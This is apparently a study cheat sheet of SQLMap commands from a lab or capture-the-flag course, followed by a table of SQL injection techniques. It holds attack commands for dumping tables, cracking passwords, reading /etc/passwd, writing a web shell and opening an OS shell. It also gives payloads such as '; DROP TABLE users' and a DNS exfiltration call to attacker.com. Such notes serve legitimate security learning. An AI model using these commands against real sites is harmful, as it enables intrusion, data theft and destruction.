SQLMap Essentials

Command	Description
sqlmap -h	View the basic help menu
sqlmap -hh	View the advanced help menu
sqlmap -u "http://www.example.com/vuln.php?id=1" --batch	Run SQLMap without asking for user input
sqlmap 'http://www.example.com/' --data 'uid=1&name=test'	SQLMap with POST request
sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'	POST request specifying an injection point with an asterisk
sqlmap -r req.txt	Passing an HTTP request file to SQLMap
sqlmap -r Case2.txt --threads 10 --dump -T flag2 --batch	-r Case2.txt: read the raw HTTP request POST /case2.php?id=1 HTTP/1.1 from Case2.txt; --threads 10: use 10 threads for faster scanning; --dump -T flag2: dump all data from table flag2; --batch: run non-interactive (use defaults for all prompts)
sqlmap -r Case3.txt -p cookie --threads 10 --dump -T flag3 --batch	-r Case3.txt: read raw HTTP request from file; -p cookie: target the cookie parameter; --threads 10: use 10 threads; --dump -T flag3: dump all data from flag3; --batch: non-interactive mode
sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'	Specifying a cookie header
sqlmap -u www.target.com --data='id=1' --method PUT	Specifying a PUT request
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt	Store traffic to an output file
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch	Specify verbosity level
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"	Specifying a prefix or suffix
sqlmap -u www.example.com/?id=1 -v 3 --level=5	Specifying the level and risk
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba	Basic DB enumeration
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb	Table enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname	Table/row enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"	Conditional enumeration
sqlmap -u "http://www.example.com/?id=1" --schema	Database schema enumeration
sqlmap -u "http://www.example.com/?id=1" --search -T user	Searching for data
sqlmap -u "http://www.example.com/?id=1" --passwords --batch	Password enumeration and cracking
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"	Anti-CSRF token bypass
sqlmap --list-tampers	List all tamper scripts
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba	Check for DBA privileges
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"	Reading a local file
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"	Writing a file
sqlmap -u "http://www.example.com/?id=1" --os-shell	Spawning an OS shell

---

Supported SQL Injection Types

We see the types of SQL injections supported by SQLMap with the sqlmap -hh command

The technique characters BEUSTQ refers to the following:

B: Boolean-based blind E: Error-based U: Union query-based S: Stacked queries T: Time-based blind Q: Inline queries

Letter	Type	Description	Example
B	Boolean-based blind	Differentiates TRUE/FALSE by comparing server responses (content, HTTP code, title, etc.), retrieving ~1 byte per request.	AND 1=1 vs. AND 1=2
E	Error-based	Leverages DBMS error messages to carry query results (“chunks” up to ~200 bytes).	AND GTID_SUBSET(@@version,0)
U	Union query-based	Appends a UNION SELECT to combine original results with injected data, potentially dumping entire tables in one go.	UNION ALL SELECT 1,@@version,3
S	Stacked queries	“Piggy-backs” multiple SQL statements (INSERT/UPDATE/DELETE/OS commands) if the platform allows it (e.g. MSSQL, PostgreSQL).	; DROP TABLE users
T	Time-based blind	Uses response delays (e.g. SLEEP()) to infer TRUE/FALSE when Boolean-blind isn’t possible (e.g. non-query contexts).	AND IF(2>1,SLEEP(5),0)
Q	Inline queries	Embeds a sub-query within the original statement to return data inline; less common but supported if the app’s SQL allows it.	SELECT (SELECT @@version) FROM users
OOB	Out-of-Band (DNS exfil)	Forces the DBMS to make external DNS requests carrying query results (e.g. via LOAD_FILE(CONCAT('\\\\',@@version,…))).	LOAD_FILE(CONCAT('\\\\',@@version,'.attacker.com\\x'))

---